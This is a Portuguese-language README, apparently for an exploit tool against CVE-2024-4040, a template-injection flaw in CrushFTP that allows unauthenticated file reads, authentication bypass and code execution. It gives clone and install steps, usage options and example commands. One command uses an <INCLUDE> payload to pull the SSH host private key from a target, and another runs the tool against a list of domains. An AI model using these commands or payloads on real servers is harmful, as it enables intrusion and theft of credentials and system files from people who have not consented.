
Exploit para a vulnerabilidade SSTI do CrushFTP (CVE-2024-4040) que permite leitura de arquivos não autenticada, bypass de autenticação e execução remota de código em servidores afetados.
Uma vulnerabilidade de injeção de template no lado do servidor no CrushFTP em todas as versões anteriores a 10.7.1 e 11.1.0 em todas as plataformas permite que atacantes remotos não autenticados leiam arquivos do sistema de arquivos fora do VFS Sandbox, ignorem a autenticação para obter acesso administrativo e executem código remotamente no servidor.
git clone https://github.com/gotr00t0day/CVE-2024-4040.git
cd CVE-2024-4040
pip3 instrall -r requirements.txt
usage: CVE-2024-4040.py [-h] [-t TARGET] [-f FILE] [-d DOMAINS]
options:
-h, --help show this help message and exit
-t TARGET, --target TARGET
target to scan
-f FILE, --file FILE file to fetch
-d DOMAINS, --domains DOMAINS
file containing list of domains
# MAKE SURE YOU USE THE <INCLUDE> TAG OR ANY OTHER TAG TO EXPLOIT THE TARGET, SOMETIMES YOU DONT NEED ANY TAGS.
# Exploit a target
python3 CVE-2024-4040.py -t http://TARGET:8080 -f "<INCLUDE>ssh_host_rsa_key</INCLUDE>"
# Exploit a list of targets
python3 CVE-2024-4040.py -d ~/list.txt -f %hostname%
Por favor, leia ATTACKERKB ANÁLISE para uma melhor compreensão de como usar este exploit.